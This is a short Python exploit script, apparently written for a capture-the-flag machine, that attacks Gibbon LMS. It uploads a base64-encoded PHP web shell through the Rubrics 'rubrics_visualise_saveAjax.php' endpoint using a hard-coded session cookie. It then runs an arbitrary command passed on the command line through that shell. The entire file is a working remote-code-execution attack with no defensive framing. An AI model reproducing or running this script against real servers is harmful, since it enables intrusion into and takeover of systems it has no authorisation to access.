import requests
import sys
import base64

TARGET = "http://frizzdc.frizz.htb"
UPLOAD_PATH = "/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"
SHELL_PATH = "/Gibbon-LMS/modules/Rubrics/rscreenshot_123456890.php"
COOKIE = {'G60fa1cd0af7be78b': '1vka2pu1otv1l3nnj5m0uugdsv'}

def generate_payload(cmd_param='1'):
    php_payload = f"<?=`{cmd_param}`?>"
    base64_payload = base64.b64encode(php_payload.encode()).decode()
    return f"data:application/x-httpd-php;base64,{base64_payload}"

def upload_shell():
    payload = generate_payload('$_GET[1]')
    multipart_data = {
        "img": payload,
        "gibbonPersonID": "123456890",
        "path": "modules/Rubrics/rscreenshot_123456890.php"
    }

    print("[*] Uploading shell...")
    r = requests.post(TARGET + UPLOAD_PATH, cookies=COOKIE, files=multipart_data)
    if r.status_code == 200:
        print("[+] Shell uploaded.")
    else:
        print(f"[!] Upload failed. HTTP {r.status_code}")
        sys.exit(1)

def trigger_shell(command):
    url = f"{TARGET}{SHELL_PATH}?1={command}"
    print(f"[*] Triggering shell: {url}")
    r = requests.get(url, cookies=COOKIE)
    if r.status_code == 200:
        print("[+] Response:\n\n" + r.text.strip())
    else:
        print(f"[!] Shell execution failed. HTTP {r.status_code}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <command>")
        sys.exit(1)

    command = sys.argv[1]
    upload_shell()
    trigger_shell(command)